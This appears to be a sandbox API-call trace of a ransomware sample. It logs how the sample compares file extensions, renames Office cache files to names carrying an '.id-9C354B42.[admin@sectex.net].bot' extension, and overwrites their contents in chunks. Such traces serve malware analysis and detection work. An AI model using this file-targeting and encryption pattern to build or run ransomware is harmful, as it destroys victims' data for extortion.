	[0039.188] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0039.188] lstrlenW (lpString=".7z") returned 3
	[0039.188] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0039.188] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74
	[0039.188] lstrlenW (lpString=".dbf") returned 4
	[0039.188] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0039.188] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74
	[0039.188] lstrlenW (lpString=".1cd") returned 4
	[0039.188] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0039.188] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab") returned 74
	[0039.188] lstrlenW (lpString=".jpg") returned 4
	[0039.188] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0039.189] lstrcmpiW (lpString1=".msi", lpString2=".bot") returned 1
	[0039.189] lstrlenW (lpString="WordMUI.msi") returned 11
	[0039.189] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4
	[0039.189] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=2522624) returned 1
	[0039.189] CloseHandle (hObject=0x1a4) returned 1
	[0039.189] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi")) returned 0x2020
	[0039.189] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0039.189] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0039.190] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.msi.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4
	[0039.190] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc6c | out: lpNewFilePointer=0x0) returned 1
	[0039.190] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0039.190] ReadFile (in: hFile=0x1a4, lpBuffer=0xae90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xae90058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0039.194] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xcd4aa, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0039.194] ReadFile (in: hFile=0x1a4, lpBuffer=0xaed0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xaed0058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0039.202] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa2dfc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0039.202] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x227e00, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0039.202] ReadFile (in: hFile=0x1a4, lpBuffer=0xaf10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xaf10058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0039.219] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0039.219] WriteFile (in: hFile=0x1a4, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0xa2dfcb0, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfcb0*=0xc0102, lpOverlapped=0x0) returned 1
	[0039.510] SetEndOfFile (hFile=0x1a4) returned 1
	[0039.510] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb4fb810
	[0039.514] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0039.514] WriteFile (in: hFile=0x1a4, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0039.516] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xcd4aa, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0039.516] WriteFile (in: hFile=0x1a4, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0039.524] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x227e00, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0039.524] WriteFile (in: hFile=0x1a4, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0039.527] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4fb810 | out: hHeap=0x7d60000) returned 1
	[0039.527] CloseHandle (hObject=0x1a4) returned 1
	[0039.937] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0039.937] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74
	[0039.937] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74
	[0039.937] lstrlenW (lpString=".doc") returned 4
	[0039.938] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0039.938] lstrlenW (lpString=".docx") returned 5
	[0039.938] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1
	[0039.938] lstrlenW (lpString=".pdf") returned 4
	[0039.938] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0039.938] lstrlenW (lpString=".xls") returned 4
	[0039.938] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0039.938] lstrlenW (lpString=".xlsx") returned 5
	[0039.938] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1
	[0039.938] lstrlenW (lpString=".ppt") returned 4
	[0039.938] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0039.938] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74
	[0039.938] lstrlenW (lpString=".zip") returned 4
	[0039.938] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0039.938] lstrlenW (lpString=".rar") returned 4
	[0039.938] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0039.938] lstrlenW (lpString=".bz2") returned 4
	[0039.938] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0039.938] lstrlenW (lpString=".7z") returned 3
	[0039.938] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0039.938] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74
	[0039.938] lstrlenW (lpString=".dbf") returned 4
	[0039.938] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0039.938] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74
	[0039.938] lstrlenW (lpString=".1cd") returned 4
	[0039.938] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0039.938] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74
	[0039.938] lstrlenW (lpString=".jpg") returned 4
	[0039.938] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0039.938] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74
	[0039.938] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74
	[0039.938] lstrlenW (lpString=".doc") returned 4
	[0039.938] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1
	[0039.938] lstrlenW (lpString=".docx") returned 5
	[0039.939] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1
	[0039.939] lstrlenW (lpString=".pdf") returned 4
	[0039.939] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1
	[0039.939] lstrlenW (lpString=".xls") returned 4
	[0039.939] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1
	[0039.939] lstrlenW (lpString=".xlsx") returned 5
	[0039.939] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1
	[0039.939] lstrlenW (lpString=".ppt") returned 4
	[0039.939] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1
	[0039.939] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74
	[0039.939] lstrlenW (lpString=".zip") returned 4
	[0039.939] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1
	[0039.939] lstrlenW (lpString=".rar") returned 4
	[0039.939] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1
	[0039.939] lstrlenW (lpString=".bz2") returned 4
	[0039.939] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1
	[0039.939] lstrlenW (lpString=".7z") returned 3
	[0039.939] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1
	[0039.939] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74
	[0039.939] lstrlenW (lpString=".dbf") returned 4
	[0039.939] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1
	[0039.939] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74
	[0039.939] lstrlenW (lpString=".1cd") returned 4
	[0039.939] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1
	[0039.939] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.msi") returned 74
	[0039.939] lstrlenW (lpString=".jpg") returned 4
	[0039.939] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1
	[0039.939] lstrcmpiW (lpString1=".cab", lpString2=".bot") returned 1
	[0039.939] lstrlenW (lpString="Proof.cab") returned 9
	[0039.939] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0039.952] GetFileSizeEx (in: hFile=0x190, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=13642474) returned 1
	[0039.952] CloseHandle (hObject=0x190) returned 1
	[0039.952] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab")) returned 0x2020
	[0039.952] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0039.952] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0039.996] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0039.997] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc6c | out: lpNewFilePointer=0x0) returned 1
	[0039.997] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0039.997] ReadFile (in: hFile=0x190, lpBuffer=0xae90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xae90058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0040.124] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x4563a3, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0040.124] ReadFile (in: hFile=0x190, lpBuffer=0xaed0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xaed0058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0040.128] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0xa2dfc6c | out: lpNewFilePointer=0xffffffff) returned 1
	[0040.128] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xcc2aea, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0040.128] ReadFile (in: hFile=0x190, lpBuffer=0xaf10058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xaf10058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0040.146] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfec8 | out: lpNewFilePointer=0x0) returned 1
	[0040.146] WriteFile (in: hFile=0x190, lpBuffer=0xae90020*, nNumberOfBytesToWrite=0xc00fe, lpNumberOfBytesWritten=0xa2dfcb0, lpOverlapped=0x0 | out: lpBuffer=0xae90020*, lpNumberOfBytesWritten=0xa2dfcb0*=0xc00fe, lpOverlapped=0x0) returned 1
	[0040.159] SetEndOfFile (hFile=0x190) returned 1
	[0040.159] RtlAllocateHeap (HeapHandle=0x7d60000, Flags=0x0, Size=0x40000) returned 0xb4fb810
	[0040.160] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0040.160] WriteFile (in: hFile=0x190, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0040.160] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x4563a3, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0040.160] WriteFile (in: hFile=0x190, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0040.508] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xcc2aea, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc7c | out: lpNewFilePointer=0x0) returned 1
	[0040.508] WriteFile (in: hFile=0x190, lpBuffer=0xb4fb810*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0xa2dfc88, lpOverlapped=0x0 | out: lpBuffer=0xb4fb810*, lpNumberOfBytesWritten=0xa2dfc88*=0x40000, lpOverlapped=0x0) returned 1
	[0040.509] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0xb4fb810 | out: hHeap=0x7d60000) returned 1
	[0040.509] CloseHandle (hObject=0x190) returned 1
	[0042.489] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x2020) returned 1
	[0042.489] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81
	[0042.489] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81
	[0042.489] lstrlenW (lpString=".doc") returned 4
	[0042.489] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0042.489] lstrlenW (lpString=".docx") returned 5
	[0042.489] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1
	[0042.489] lstrlenW (lpString=".pdf") returned 4
	[0042.489] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0042.489] lstrlenW (lpString=".xls") returned 4
	[0042.489] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0042.489] lstrlenW (lpString=".xlsx") returned 5
	[0042.489] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1
	[0042.489] lstrlenW (lpString=".ppt") returned 4
	[0042.489] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0042.489] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81
	[0042.489] lstrlenW (lpString=".zip") returned 4
	[0042.489] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0042.489] lstrlenW (lpString=".rar") returned 4
	[0042.489] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0042.489] lstrlenW (lpString=".bz2") returned 4
	[0042.489] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0042.490] lstrlenW (lpString=".7z") returned 3
	[0042.490] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0042.490] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81
	[0042.490] lstrlenW (lpString=".dbf") returned 4
	[0042.490] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0042.490] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81
	[0042.490] lstrlenW (lpString=".1cd") returned 4
	[0042.490] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0042.490] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81
	[0042.490] lstrlenW (lpString=".jpg") returned 4
	[0042.490] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0042.490] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81
	[0042.490] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81
	[0042.490] lstrlenW (lpString=".doc") returned 4
	[0042.490] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1
	[0042.490] lstrlenW (lpString=".docx") returned 5
	[0042.490] lstrcmpiW (lpString1=".docx", lpString2="f.cab") returned -1
	[0042.490] lstrlenW (lpString=".pdf") returned 4
	[0042.490] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1
	[0042.490] lstrlenW (lpString=".xls") returned 4
	[0042.490] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1
	[0042.490] lstrlenW (lpString=".xlsx") returned 5
	[0042.490] lstrcmpiW (lpString1=".xlsx", lpString2="f.cab") returned -1
	[0042.490] lstrlenW (lpString=".ppt") returned 4
	[0042.490] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1
	[0042.490] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81
	[0042.490] lstrlenW (lpString=".zip") returned 4
	[0042.490] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1
	[0042.490] lstrlenW (lpString=".rar") returned 4
	[0042.490] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1
	[0042.490] lstrlenW (lpString=".bz2") returned 4
	[0042.490] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1
	[0042.490] lstrlenW (lpString=".7z") returned 3
	[0042.491] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1
	[0042.491] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81
	[0042.491] lstrlenW (lpString=".dbf") returned 4
	[0042.491] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1
	[0042.491] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81
	[0042.491] lstrlenW (lpString=".1cd") returned 4
	[0042.491] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1
	[0042.491] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 81
	[0042.491] lstrlenW (lpString=".jpg") returned 4
	[0042.491] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1
	[0042.491] lstrcmpiW (lpString1=".cab", lpString2=".bot") returned 1
	[0042.491] lstrlenW (lpString="OWOW32LR.cab") returned 12
	[0042.491] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190
	[0042.491] GetFileSizeEx (in: hFile=0x190, lpFileSize=0xa2dff1c | out: lpFileSize=0xa2dff1c*=2928955) returned 1
	[0042.491] CloseHandle (hObject=0x190) returned 1
	[0042.491] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab")) returned 0x2020
	[0042.492] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0042.492] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.id-9c354b42.[admin@sectex.net].bot")) returned 1
	[0042.926] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0
	[0042.926] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc6c | out: lpNewFilePointer=0x0) returned 1
	[0042.926] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0042.926] ReadFile (in: hFile=0x1f0, lpBuffer=0xae90058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xae90058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
	[0042.930] SetFilePointerEx (in: hFile=0x1f0, liDistanceToMove=0xee5be, lpNewFilePointer=0x0, dwMoveMethod=0xa2dfc2c | out: lpNewFilePointer=0x0) returned 1
	[0042.931] ReadFile (in: hFile=0x1f0, lpBuffer=0xaed0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0xa2dfc38, lpOverlapped=0x0 | out: lpBuffer=0xaed0058*, lpNumberOfBytesRead=0xa2dfc38*=0x40000, lpOverlapped=0x0) returned 1
